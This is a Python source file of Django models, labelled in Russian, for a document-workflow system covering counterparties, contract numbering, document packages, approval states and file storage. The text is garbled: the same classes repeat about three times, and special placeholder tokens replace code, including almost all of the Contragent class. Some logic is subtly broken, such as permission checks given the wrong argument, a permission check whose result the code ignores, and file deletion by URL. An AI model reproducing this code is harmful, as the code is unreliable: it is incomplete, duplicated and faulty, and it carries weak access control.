def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE, default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=
True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/', blank=True,
null=True)
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Contragent(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def check_and_create_parent_folder(self):
if not os.path.isdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[
self.klass][1])):
os.mkdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[self.
klass][1]), mode=511)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_active_package(self):
res = DocumentsPackage.get_active_package(self)
return res
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name_plural = 'Контрагенты'
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE, default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=
True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/', blank=True,
null=True)
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
